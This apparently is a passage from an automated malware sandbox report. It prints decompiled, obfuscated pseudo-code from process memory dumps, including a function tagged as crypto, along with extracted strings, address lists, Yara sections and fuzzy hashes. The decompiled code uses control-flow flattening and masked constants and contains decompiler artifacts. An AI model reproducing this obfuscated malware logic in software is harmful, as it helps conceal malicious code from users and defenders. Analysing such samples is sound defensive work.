				_v1584 = 0;
				_push(0x30);
				_v1640 = _v1640 * 0x32;
				_v1640 = _v1640 ^ 0x2a75666c;
				_v1656 = 0xd7be76;
				_v1656 = _v1656 | 0x34323abd;
				_v1656 = _v1656 + 0xffff2f67;
				_v1656 = _v1656 ^ 0x34f4d203;
				_v1624 = 0xd0dbb;
				_v1624 = _v1624 | 0x70664d6a;
				_v1624 = _v1624 ^ 0x706fa006;
				_v1732 = 0x536538;
				_v1732 = _v1732 | 0x24a4777c;
				_v1732 = _v1732 ^ 0x923db7c3;
				_v1732 = _v1732 + 0x4861;
				_v1732 = _v1732 ^ 0xb6cd66e1;
				_v1748 = 0x993ccf;
				_v1748 = _v1748 + 0xffffaa41;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 >> 8;
				_v1748 = _v1748 ^ 0x00061c85;
				_v1616 = 0xb9c354;
				_v1616 = _v1616 | 0x2561c52e;
				_v1616 = _v1616 ^ 0x25f7eb7a;
				_v1604 = 0xa28582;
				_v1604 = _v1604 / 0;
				_v1604 = _v1604 ^ 0x00043a3e;
				_v1772 = 0x2f2960;
				_t84 =  &_v1772; // 0x2f2960
				_v1772 =  *_t84 / 0;
				_v1772 = _v1772 + 0xffff6c9f;
				_v1772 = _v1772 >> 2;
				_v1772 = _v1772 ^ 0x000d3123;
				_v1600 = 0xfa6674;
				_v1600 = _v1600 >> 9;
				_v1600 = _v1600 ^ 0x0007cbd1;
				_v1716 = 0x560e41;
				_v1716 = _v1716 << 5;
				_v1716 = _v1716 + 0xffff30ad;
				_v1716 = _v1716 ^ 0xf856c5ca;
				_v1716 = _v1716 ^ 0xf29d60ab;
				_v1672 = 0x1d03b2;
				_v1672 = _v1672 >> 7;
				_v1672 = _v1672 ^ 0xe2467494;
				_v1672 = _v1672 ^ 0xe240383a;
				_v1740 = 0xd45536;
				_v1740 = _v1740 << 3;
				_push(0x70);
				_v1740 = _v1740 / 0;
				_v1740 = _v1740 + 0xffff99e5;
				_v1740 = _v1740 ^ 0x00077f48;
				_v1708 = 0x37049a;
				_push(0x4e);
				_v1708 = _v1708 * 0x39;
				_v1708 = _v1708 * 0x32;
				_v1708 = _v1708 | 0x2af70c33;
				_v1708 = _v1708 ^ 0x6efda064;
				_v1752 = 0xbab6bc;
				_v1752 = _v1752 << 5;
				_v1752 = _v1752 + 0xffffe6d4;
				_v1752 = _v1752 + 0xf210;
				_v1752 = _v1752 ^ 0x175ee840;
				_v1608 = 0x31e74e;
				_v1608 = _v1608 + 0x87a0;
				_v1608 = _v1608 ^ 0x003933ce;
				_v1760 = 0x96d30d;
				_v1760 = _v1760 / 0;
				_v1760 = _v1760 << 0xb;
				_v1760 = _v1760 ^ 0x06fe780e;
				_v1760 = _v1760 ^ 0x0c3ab2ae;
				_v1768 = 0xcb4538;
				_v1768 = _v1768 << 6;
				_v1768 = _v1768 << 8;
				_v1768 = _v1768 ^ 0xf0045857;
				_v1768 = _v1768 ^ 0x214cdbb6;
				_v1688 = 0x3364c3;
				_v1688 = _v1688 | 0xfc10ce05;
				_v1688 = _v1688 >> 0xc;
				_v1688 = _v1688 ^ 0x0002c610;
				_v1592 = 0x6206a4;
				_push(0x68);
				_v1592 = _v1592 / 0;
				_v1592 = _v1592 ^ 0x00096e0c;
				_v1744 = 0x9a9470;
				_push(0x22);
				_v1744 = _v1744 / 0;
				_v1744 = _v1744 / 0;
				_v1744 = _v1744 + 0xe629;
				_v1744 = _v1744 ^ 0x000750d6;
				_v1712 = 0x14816c;
				_v1712 = _v1712 >> 6;
				_v1712 = _v1712 << 8;
				_v1712 = _v1712 >> 0xa;
				_v1712 = _v1712 ^ 0x0006d353;
				_v1728 = 0x517bb7;
				_v1728 = _v1728 << 0xd;
				_v1728 = _v1728 ^ 0x3d335e2b;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 ^ 0x22dfec30;
				_v1636 = 0x2e04b8;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000a8a1f;
				_v1644 = 0x4d797d;
				_v1644 = _v1644 + 0xffffc264;
				_v1644 = _v1644 ^ 0x0042207f;
				_v1736 = 0x555718;
				_push(0x11);
				_push(0x66);
				_v1736 = _v1736 / 0;
				_push(5);
				_v1736 = _v1736 / 0;
				_v1736 = _v1736 << 0xf;
				_v1736 = _v1736 ^ 0x064b7648;
				_v1692 = 0x69628a;
				_v1692 = _v1692 + 0xffff1f54;
				_v1692 = _v1692 + 0x2631;
				_v1692 = _v1692 ^ 0x00677b46;
				_v1620 = 0xa26def;
				_v1620 = _v1620 + 0xffff3fe2;
				_v1620 = _v1620 ^ 0x00a11335;
				_v1676 = 0xedbb26;
				_v1676 = _v1676 ^ 0x1d2520cb;
				_push(0x24);
				_v1676 = _v1676 / 0;
				_v1676 = _v1676 ^ 0x05f45423;
				_v1696 = 0xcbe6d7;
				_v1696 = _v1696 | 0x05e38ba5;
				_v1696 = _v1696 + 0x750f;
				_v1696 = _v1696 + 0xffff8782;
				_v1696 = _v1696 ^ 0x05e5f613;
				_v1704 = 0x6f7b13;
				_v1704 = _v1704 ^ 0x2497e687;
				_v1704 = _v1704 | 0xe6febff7;
				_v1704 = _v1704 ^ 0xe6fc654b;
				_v1756 = 0xffd234;
				_v1756 = _v1756 | 0x2784bbb9;
				_push(0x7b);
				_v1756 = _v1756 / 0;
				_v1756 = _v1756 << 0xa;
				_v1756 = _v1756 ^ 0x71c6b343;
				_v1700 = 0xc7eab6;
				_v1700 = _v1700 ^ 0x1d8d41ba;
				_v1700 = _v1700 * 0x62;
				_v1700 = _v1700 >> 3;
				_v1700 = _v1700 ^ 0x06d58bd0;
				_v1764 = 0xbf82d0;
				_v1764 = _v1764 + 0xa841;
				_v1764 = _v1764 ^ 0x5b0be419;
				_v1764 = _v1764 / 0;
				_v1764 = _v1764 ^ 0x00b8f45b;
				_v1648 = 0xb1e911;
				_v1648 = _v1648 >> 0xa;
				_v1648 = _v1648 ^ 0x0001dabf;
				_v1664 = 0x82c0c8;
				_v1664 = _v1664 | 0x5049715d;
				_v1664 = _v1664 << 0x10;
				_v1664 = _v1664 ^ 0xf1d7801f;
				_v1596 = 0x501912;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x0011e0e6;
				_v1680 = 0xb74d6a;
				_v1680 = _v1680 << 2;
				_v1680 = _v1680 + 0xe7bf;
				_v1680 = _v1680 ^ 0x02d8e76f;
				_v1632 = 0xb33cbe;
				_push(9);
				_t507 = _v1584;
				_v1632 = _v1632 / 0;
				_v1632 = _v1632 ^ 0x00185539;
				_v1588 = 0xe243c5;
				_v1588 = _v1588 * 0x6e;
				_v1588 = _v1588 ^ 0x6134a095;
				_v1652 = 0xdd8522;
				_v1652 = _v1652 >> 0xd;
				_v1652 = _v1652 + 0xffff03a2;
				_v1652 = _v1652 ^ 0xfff3aaff;
				_v1660 = 0x14cb16;
				_v1660 = _v1660 + 0xf2a5;
				_v1660 = _v1660 ^ 0xf73fdfe0;
				_v1660 = _v1660 ^ 0xf72952af;
				_v1668 = 0x99f37;
				_v1668 = _v1668 | 0xf3ff6f1f;
				_v1668 = _v1668 ^ 0xf3f97928;
				_v1612 = 0x42a852;
				_v1612 = _v1612 + 0xffffd393;
				_v1612 = _v1612 ^ 0x004ec082;
				while(1) {
					L1:
					_t523 = 0x5c;
					while(1) {
						L2:
						_t486 = 0x60246ae;
						do {
							L3:
							if(_t571 == 0x2843c29) {
								_push(_v1744);
								_push(_v1592);
								__eflags = E0121975A(0x12110a0,  &_v1580, _v1628, _v1712, _v1720, _v1728, _v1636, _v1644, _v1736, _v1692, 0x12110a0, 0x12110a0, E0122CD35(0x12110a0, _v1688, __eflags));
								_t571 =  ==  ? 0x60246ae : 0x7a70633;
								E0122629F(_v1620, _t487, _v1676, _v1696, _v1704);
								_t576 =  &(_t576[0x10]);
								_t486 = 0x60246ae;
								_t523 = 0x5c;
								goto L17;
							} else {
								if(_t571 == 0x46efd61) {
									_push(_v1604);
									_push(_v1616);
									_t491 = E0122CD35(0x1211020, _v1748, __eflags);
									E012323F2( &_v1040, __eflags);
									E0122E35F( *0x1235218 + 0x18, __eflags, _v1772, _v1600, _v1716, 0x104, _v1672,  &_v1560,  &_v1040, _t491, _v1740,  *0x1235218 + 0x234, _v1708);
									E0122629F(_v1752, _t491, _v1608, _v1760, _v1768);
									_t576 =  &(_t576[0x10]);
									_t571 = 0xa4d7bc3;
									goto L1;
								} else {
									if(_t571 == _t486) {
										_t502 = E012300C1( &_v1560, _v1648, _v1724, _v1580, 2 + E0121B01D(_v1756, _v1700,  &_v1560, _v1764) * 2, _v1664, _v1596, _v1680, _v1632, _v1588, _t507);
										_t576 =  &(_t576[0xc]);
										__eflags = _t502;
										_t571 = 0xaadd24e;
										_v1584 = 0 | __eflags == 0x00000000;
										while(1) {
											L1:
											_t523 = 0x5c;
											goto L2;
										}
									} else {
										if(_t571 == 0xa4d7bc3) {
											_t509 =  *0x1235218 + 0x234;
											while(1) {
												__eflags =  *_t509 - _t523;
												if(__eflags == 0) {
													break;
												}
												_t509 = _t509 + 2;
												__eflags = _t509;
											}
											_t507 = _t509 + 2;
											_t571 = 0x2843c29;
											goto L2;
										} else {
											if(_t571 == 0xaadd24e) {
												E01219FE4(_v1580, _v1652, _v1660, _v1668, _v1612);
											} else {
												if(_t571 != 0xcaba985) {
													goto L17;
												} else {
													E0121B3B4(_v1640, _t523, _v1656, _t523, _v1624,  &_v520, _v1732, _v1684);
													_t576 =  &(_t576[7]);
													_t571 = 0x46efd61;
													while(1) {
														L1:
														_t523 = 0x5c;
														L2:
														_t486 = 0x60246ae;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L20:
							return _v1584;
							L17:
							__eflags = _t571 - 0x7a70633;
						} while (__eflags != 0);
						goto L20;
					}
				}
			}



































































                          0x0122590e
                          0x01225914
                          0x01225921
                          0x0122592a
                          0x01225931
                          0x0122593c
                          0x0122594d
                          0x01225951
                          0x01225956
                          0x0122595e
                          0x01225966
                          0x0122596e
                          0x01225976
                          0x0122597e
                          0x01225986
                          0x01225991
                          0x0122599c
                          0x012259a7
                          0x012259af
                          0x012259b7
                          0x012259bc
                          0x012259c4
                          0x012259cc
                          0x012259df
                          0x012259e1
                          0x012259e9
                          0x012259eb
                          0x012259f2
                          0x012259fd
                          0x01225a08
                          0x01225a13
                          0x01225a1e
                          0x01225a29
                          0x01225a34
                          0x01225a3f
                          0x01225a4a
                          0x01225a52
                          0x01225a5a
                          0x01225a62
                          0x01225a6a
                          0x01225a72
                          0x01225a7a
                          0x01225a82
                          0x01225a87
                          0x01225a8c
                          0x01225a94
                          0x01225a9f
                          0x01225aaa
                          0x01225ab5
                          0x01225acb
                          0x01225ad2
                          0x01225add
                          0x01225ae5
                          0x01225aec
                          0x01225af0
                          0x01225af8
                          0x01225afd
                          0x01225b05
                          0x01225b10
                          0x01225b18
                          0x01225b23
                          0x01225b2b
                          0x01225b30
                          0x01225b38
                          0x01225b40
                          0x01225b48
                          0x01225b50
                          0x01225b55
                          0x01225b5d
                          0x01225b67
                          0x01225b6f
                          0x01225b78
                          0x01225b7f
                          0x01225b83
                          0x01225b8b
                          0x01225b93
                          0x01225ba0
                          0x01225ba2
                          0x01225bab
                          0x01225baf
                          0x01225bb7
                          0x01225bbf
                          0x01225bc7
                          0x01225bcc
                          0x01225bd4
                          0x01225bdc
                          0x01225be4
                          0x01225bef
                          0x01225bfa
                          0x01225c05
                          0x01225c15
                          0x01225c19
                          0x01225c1e
                          0x01225c26
                          0x01225c2e
                          0x01225c36
                          0x01225c3b
                          0x01225c40
                          0x01225c48
                          0x01225c50
                          0x01225c58
                          0x01225c60
                          0x01225c65
                          0x01225c6d
                          0x01225c82
                          0x01225c84
                          0x01225c8d
                          0x01225c98
                          0x01225ca7
                          0x01225ca9
                          0x01225cb6
                          0x01225cba
                          0x01225cc2
                          0x01225cca
                          0x01225cd2
                          0x01225cd7
                          0x01225cdc
                          0x01225ce1
                          0x01225ce9
                          0x01225cf1
                          0x01225cf6
                          0x01225cfe
                          0x01225d03
                          0x01225d0b
                          0x01225d16
                          0x01225d1e
                          0x01225d29
                          0x01225d34
                          0x01225d3f
                          0x01225d4c
                          0x01225d58
                          0x01225d5d
                          0x01225d5f
                          0x01225d6c
                          0x01225d6e
                          0x01225d74
                          0x01225d79
                          0x01225d81
                          0x01225d89
                          0x01225d91
                          0x01225d99
                          0x01225da1
                          0x01225dac
                          0x01225db7
                          0x01225dc2
                          0x01225dca
                          0x01225dd9
                          0x01225ddb
                          0x01225de1
                          0x01225de9
                          0x01225df1
                          0x01225df9
                          0x01225e01
                          0x01225e09
                          0x01225e11
                          0x01225e19
                          0x01225e21
                          0x01225e29
                          0x01225e31
                          0x01225e39
                          0x01225e48
                          0x01225e4a
                          0x01225e50
                          0x01225e55
                          0x01225e5d
                          0x01225e65
                          0x01225e73
                          0x01225e77
                          0x01225e7c
                          0x01225e84
                          0x01225e8c
                          0x01225e94
                          0x01225ea2
                          0x01225ea6
                          0x01225eae
                          0x01225eb9
                          0x01225ec1
                          0x01225ecc
                          0x01225ed4
                          0x01225edc
                          0x01225ee1
                          0x01225ee9
                          0x01225ef4
                          0x01225efc
                          0x01225f07
                          0x01225f0f
                          0x01225f14
                          0x01225f1c
                          0x01225f24
                          0x01225f3d
                          0x01225f42
                          0x01225f49
                          0x01225f50
                          0x01225f5b
                          0x01225f6e
                          0x01225f75
                          0x01225f80
                          0x01225f8b
                          0x01225f93
                          0x01225f9e
                          0x01225fa9
                          0x01225fb4
                          0x01225fbf
                          0x01225fca
                          0x01225fd5
                          0x01225fdd
                          0x01225fe5
                          0x01225fed
                          0x01225ff8
                          0x01226003
                          0x0122600e
                          0x0122600e
                          0x01226010
                          0x01226011
                          0x01226011
                          0x01226011
                          0x01226016
                          0x01226016
                          0x01226018
                          0x012261c7
                          0x012261d0
                          0x01226221
                          0x01226244
                          0x01226247
                          0x0122624c
                          0x0122624f
                          0x01226256
                          0x00000000
                          0x0122601e
                          0x01226024
                          0x01226122
                          0x0122612e
                          0x01226139
                          0x01226147
                          0x0122619b
                          0x012261b5
                          0x012261ba
                          0x012261bd
                          0x00000000
                          0x0122602a
                          0x0122602c
                          0x01226102
                          0x01226109
                          0x0122610c
                          0x0122610e
                          0x01226116
                          0x0122600e
                          0x0122600e
                          0x01226010
                          0x00000000
                          0x01226010
                          0x0122602e
                          0x01226034
                          0x0122608a
                          0x01226095
                          0x01226095
                          0x01226098
                          0x00000000
                          0x00000000
                          0x01226092
                          0x01226092
                          0x01226092
                          0x0122609a
                          0x0122609d
                          0x00000000
                          0x01226036
                          0x0122603c
                          0x01226285
                          0x01226042
                          0x01226048
                          0x00000000
                          0x0122604e
                          0x01226075
                          0x0122607a
                          0x0122607d
                          0x0122600e
                          0x0122600e
                          0x01226010
                          0x01226011
                          0x01226011
                          0x00000000
                          0x01226011
                          0x0122600e
                          0x01226048
                          0x0122603c
                          0x01226034
                          0x0122602c
                          0x01226024
                          0x0122628d
                          0x0122629e
                          0x01226257
                          0x01226257
                          0x01226257
                          0x00000000
                          0x01226263
                          0x01226011

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #1$)$+^3=$7l$:8@$F{g$N1$]qIP$`)/$jMfp$lfu*$y<$}yM
                          • API String ID: 0-2915221957
                          • Opcode ID: a5b66e567db1b9f1decffdd5b08684b008b6d444d2ace61bc1db03fd469116e4
                          • Instruction ID: 96d821ad38ba38df4e47aa922f407e8e87d6e159e5e30e7a86409fcaf5e9428a
                          • Opcode Fuzzy Hash: a5b66e567db1b9f1decffdd5b08684b008b6d444d2ace61bc1db03fd469116e4
                          • Instruction Fuzzy Hash: C122F1725083809FD3B8CF25C88AA8FBBE2BBD4748F10891DE1D986260D7B58549DF47
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23A890, Relevance: 15.7, Strings: 11, Instructions: 1959COMMON
                          Download Yara Rule
                          Strings
                          • .assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6F23BCC4, 6F23C087
                          • .llvm.C:krlaoyielwznvejuafezypqcocmjtjjtbijbqwlufiemtvzrncrsqklaorfwhkaclbsrhxcyxfrzrgfapvzyvasietlisocljucmq, xrefs: 6F23A8AD
                          • __ZN, xrefs: 6F23AD97
                          • $, xrefs: 6F23BBE3
                          • called `Result::unwrap()` on an `Err` value, xrefs: 6F23C14D
                          • h, xrefs: 6F23B8AB
                          • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6F23B589
                          • SizeLimitExhausted, xrefs: 6F23C299
                          • called `Option::unwrap()` on a `None` value, xrefs: 6F23C12E
                          • $, xrefs: 6F23BBF3
                          • @*&<>()C,, xrefs: 6F23C030, 6F23C0F2
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: $$$$.assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed$.llvm.C:krlaoyielwznvejuafezypqcocmjtjjtbijbqwlufiemtvzrncrsqklaorfwhkaclbsrhxcyxfrzrgfapvzyvasietlisocljucmq$@*&<>()C,$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value$h
                          • API String ID: 0-351887750
                          • Opcode ID: bf574c1ae66b8660fdf332f4a49a62b1e46037e7e01f2614aa69d8de7b6dfb93
                          • Instruction ID: 807d6432e3e2717a59fa4fcd958732cc33f92edb2791454f1897a483236430b2
                          • Opcode Fuzzy Hash: bf574c1ae66b8660fdf332f4a49a62b1e46037e7e01f2614aa69d8de7b6dfb93
                          • Instruction Fuzzy Hash: 6FE2F5F3E5877A8BC714CE28C49065AB7E2AFC5711F148A2EE4E58B291D731E845CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122C205, Relevance: 14.2, Strings: 11, Instructions: 450COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E0122C205(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				unsigned int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				void* _t487;
				void* _t491;
				short* _t496;
				void* _t498;
				void* _t504;
				void* _t507;
				void* _t516;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				void* _t529;
				void* _t543;
				signed int _t589;
				void* _t591;
				signed int* _t596;

				_t596 =  &_v1788;
				_v1584 = _v1584 & 0x00000000;
				_v1632 = 0x53b728;
				_v1632 = _v1632 + 0xffffd00f;
				_v1632 = _v1632 ^ 0x02538737;
				_v1692 = 0x5dde51;
				_v1692 = _v1692 + 0xffffc72f;
				_v1692 = _v1692 << 8;
				_v1692 = _v1692 ^ 0x5da9926e;
				_v1672 = 0xad9f1;
				_v1672 = _v1672 >> 8;
				_v1672 = _v1672 + 0xfffff529;
				_v1672 = _v1672 ^ 0x00008b94;
				_v1596 = 0xf223a8;
				_t516 = __ecx;
				_t591 = 0x64278db;
				_t518 = 0x1f;
				_v1596 = _v1596 / _t518;
				_v1596 = _v1596 ^ 0x000ed2b2;
				_v1768 = 0x3ef02a;
				_v1768 = _v1768 << 7;
				_v1768 = _v1768 + 0xa089;
				_v1768 = _v1768 + 0x3571;
				_v1768 = _v1768 ^ 0x1f77b471;
				_v1708 = 0xc715be;
				_t519 = 0x7c;
				_v1708 = _v1708 / _t519;
				_v1708 = _v1708 + 0xa9b;
				_v1708 = _v1708 ^ 0x000cc03e;
				_v1640 = 0xf5c20e;
				_v1640 = _v1640 + 0x1e32;
				_v1640 = _v1640 ^ 0x00fd9706;
				_v1680 = 0xf22aa7;
				_v1680 = _v1680 | 0x1e0d26ed;
				_t520 = 0x43;
				_v1680 = _v1680 * 0x62;
				_v1680 = _v1680 ^ 0xddab6df6;
				_v1756 = 0x5f1bc1;
				_v1756 = _v1756 << 0xa;
				_v1756 = _v1756 | 0x1ee2bf71;
				_v1756 = _v1756 << 0x10;
				_v1756 = _v1756 ^ 0xbf7898bf;
				_v1644 = 0x395bf;
				_v1644 = _v1644 << 7;
				_v1644 = _v1644 ^ 0x01cfa7c3;
				_v1772 = 0x3904e8;
				_v1772 = _v1772 + 0x8f69;
				_v1772 = _v1772 + 0xdb14;
				_v1772 = _v1772 | 0x17a7223e;
				_v1772 = _v1772 ^ 0x17b3767c;
				_v1788 = 0xab8cbd;
				_v1788 = _v1788 >> 0xc;
				_v1788 = _v1788 / _t520;
				_v1788 = _v1788 + 0xffffbfe3;
				_v1788 = _v1788 ^ 0xfffe4ed4;
				_v1604 = 0xc318fb;
				_v1604 = _v1604 * 0x15;
				_v1604 = _v1604 ^ 0x100d5bde;
				_v1712 = 0xdecc74;
				_v1712 = _v1712 << 0xf;
				_v1712 = _v1712 * 0x6a;
				_v1712 = _v1712 ^ 0x540cb602;
				_v1784 = 0x375fb9;
				_v1784 = _v1784 << 4;
				_v1784 = _v1784 | 0xabc0ebaf;
				_v1784 = _v1784 << 2;
				_v1784 = _v1784 ^ 0xafd33898;
				_v1688 = 0x35bac8;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 >> 6;
				_v1688 = _v1688 ^ 0x000070de;
				_v1588 = 0xb58e78;
				_v1588 = _v1588 ^ 0xb0c46a78;
				_v1588 = _v1588 ^ 0xb07b43dd;
				_v1636 = 0x8b407b;
				_t521 = 0x2f;
				_v1636 = _v1636 / _t521;
				_v1636 = _v1636 ^ 0x000c4486;
				_v1704 = 0x9211ca;
				_v1704 = _v1704 | 0x22c82110;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0x5b4dbfff;
				_v1732 = 0x261d00;
				_v1732 = _v1732 | 0xce3841e3;
				_v1732 = _v1732 + 0xffff8b72;
				_v1732 = _v1732 ^ 0xce34913b;
				_v1620 = 0xaa7fd6;
				_v1620 = _v1620 >> 9;
				_v1620 = _v1620 ^ 0x00008b2b;
				_v1592 = 0x25885e;
				_v1592 = _v1592 + 0xffff7d04;
				_v1592 = _v1592 ^ 0x0020c98d;
				_v1736 = 0xe0d47f;
				_v1736 = _v1736 + 0x6f49;
				_v1736 = _v1736 >> 4;
				_v1736 = _v1736 ^ 0x0009d074;
				_v1628 = 0x512d73;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x14481f98;
				_v1660 = 0x3ed413;
				_v1660 = _v1660 + 0xffff4d81;
				_v1660 = _v1660 ^ 0x00309f09;
				_v1776 = 0x7eaa8f;
				_v1776 = _v1776 << 0xb;
				_v1776 = _v1776 >> 2;
				_t522 = 0x6f;
				_v1776 = _v1776 / _t522;
				_v1776 = _v1776 ^ 0x0084e4b8;
				_v1600 = 0x7d4705;
				_v1600 = _v1600 >> 7;
				_v1600 = _v1600 ^ 0x000c849c;
				_v1724 = 0x268426;
				_v1724 = _v1724 ^ 0xdd0187c5;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 ^ 0xc0f20a62;
				_v1648 = 0x88354a;
				_v1648 = _v1648 + 0x46c9;
				_v1648 = _v1648 ^ 0x00820072;
				_v1656 = 0x199859;
				_v1656 = _v1656 + 0xffffc38f;
				_v1656 = _v1656 ^ 0x001738cc;
				_v1716 = 0x9ddb87;
				_v1716 = _v1716 | 0xc4b29989;
				_v1716 = _v1716 >> 7;
				_v1716 = _v1716 ^ 0x018a1e72;
				_v1612 = 0xef86f2;
				_v1612 = _v1612 >> 4;
				_v1612 = _v1612 ^ 0x00099134;
				_v1696 = 0xbb1d9c;
				_t523 = 0x57;
				_v1696 = _v1696 / _t523;
				_t524 = 0x5d;
				_v1696 = _v1696 / _t524;
				_v1696 = _v1696 ^ 0x0009288e;
				_v1780 = 0xa5e37;
				_t245 =  &_v1780; // 0xa5e37
				_t525 = 0x2a;
				_v1780 =  *_t245 * 0x15;
				_v1780 = _v1780 ^ 0x77e30140;
				_v1780 = _v1780 * 0x2f;
				_v1780 = _v1780 ^ 0xe3c80932;
				_v1728 = 0xd57028;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 / _t525;
				_v1728 = _v1728 ^ 0x000f0094;
				_v1764 = 0xcd1fae;
				_v1764 = _v1764 ^ 0xc4f885fe;
				_v1764 = _v1764 ^ 0x05d45947;
				_t526 = 0x54;
				_v1764 = _v1764 * 0x7d;
				_v1764 = _v1764 ^ 0xab389179;
				_v1720 = 0xb4f0e6;
				_v1720 = _v1720 ^ 0x1f4d57f4;
				_v1720 = _v1720 / _t526;
				_v1720 = _v1720 ^ 0x00604eb2;
				_v1748 = 0x63ad26;
				_v1748 = _v1748 + 0xad4f;
				_v1748 = _v1748 ^ 0x0965e416;
				_v1748 = _v1748 + 0xffff38ee;
				_v1748 = _v1748 ^ 0x0906cb18;
				_v1664 = 0x920166;
				_v1664 = _v1664 << 0x10;
				_v1664 = _v1664 ^ 0x016542eb;
				_v1652 = 0x809268;
				_v1652 = _v1652 << 8;
				_v1652 = _v1652 ^ 0x8096ea3b;
				_v1616 = 0x543760;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0xa1b1aa26;
				_v1676 = 0xb03be2;
				_v1676 = _v1676 >> 0xb;
				_v1676 = _v1676 + 0xd6ce;
				_v1676 = _v1676 ^ 0x000f22cb;
				_v1760 = 0xdc251e;
				_v1760 = _v1760 | 0x3ab91ea5;
				_v1760 = _v1760 + 0x2428;
				_t527 = 0x18;
				_v1760 = _v1760 * 0x45;
				_v1760 = _v1760 ^ 0xe64e7237;
				_v1684 = 0x929343;
				_v1684 = _v1684 ^ 0xdb83494f;
				_v1684 = _v1684 / _t527;
				_v1684 = _v1684 ^ 0x092a7c84;
				_v1740 = 0x63a33d;
				_v1740 = _v1740 + 0xfffffdc3;
				_v1740 = _v1740 ^ 0xeecf69ea;
				_v1740 = _v1740 ^ 0xeea535df;
				_v1608 = 0xb62693;
				_v1608 = _v1608 >> 4;
				_v1608 = _v1608 ^ 0x000522a0;
				_v1668 = 0x2d10b5;
				_v1668 = _v1668 >> 7;
				_v1668 = _v1668 + 0x1174;
				_v1668 = _v1668 ^ 0x000d75a2;
				_v1744 = 0x9bc249;
				_t528 = 0x1b;
				_v1744 = _v1744 / _t528;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 + 0x97a6;
				_v1744 = _v1744 ^ 0x0003d8b3;
				_v1752 = 0x81a885;
				_v1752 = _v1752 | 0x7c450d1e;
				_v1752 = _v1752 + 0x4652;
				_v1752 = _v1752 << 0xe;
				_v1752 = _v1752 ^ 0x7cf762d8;
				_v1624 = 0xd67170;
				_v1624 = _v1624 >> 9;
				_v1624 = _v1624 ^ 0x00041f96;
				_v1700 = 0x51d643;
				_v1700 = _v1700 >> 9;
				_v1700 = _v1700 >> 7;
				_v1700 = _v1700 ^ 0x00081f7a;
				_t589 = _v1584;
				while(1) {
					L1:
					_t487 = 0x689aa28;
					while(1) {
						L2:
						_t529 = 0xc3fdd40;
						do {
							L3:
							while(_t591 != 0x27e97d) {
								if(_t591 == 0x88c97f) {
									_push(_t529);
									_t491 = E0122EA55(0, _v1616, __eflags, _v1676,  &_v1564, _v1760, 0, _v1684, _v1740,  &_v1580);
									__eflags = _t491;
									if(_t491 == 0) {
										L26:
										return _t491;
									}
									E01224A33(_v1608, _v1668, _v1580);
									return E01224A33(_v1744, _v1752, _v1576);
								}
								if(_t591 == 0x64278db) {
									_t591 = 0xf344949;
									continue;
								}
								if(_t591 == 0xb379dcd) {
									__eflags = _t589 - _t487;
									if(__eflags != 0) {
										_t591 = 0xb6fc5c6;
										continue;
									}
									_push(_v1640);
									_push(_t529);
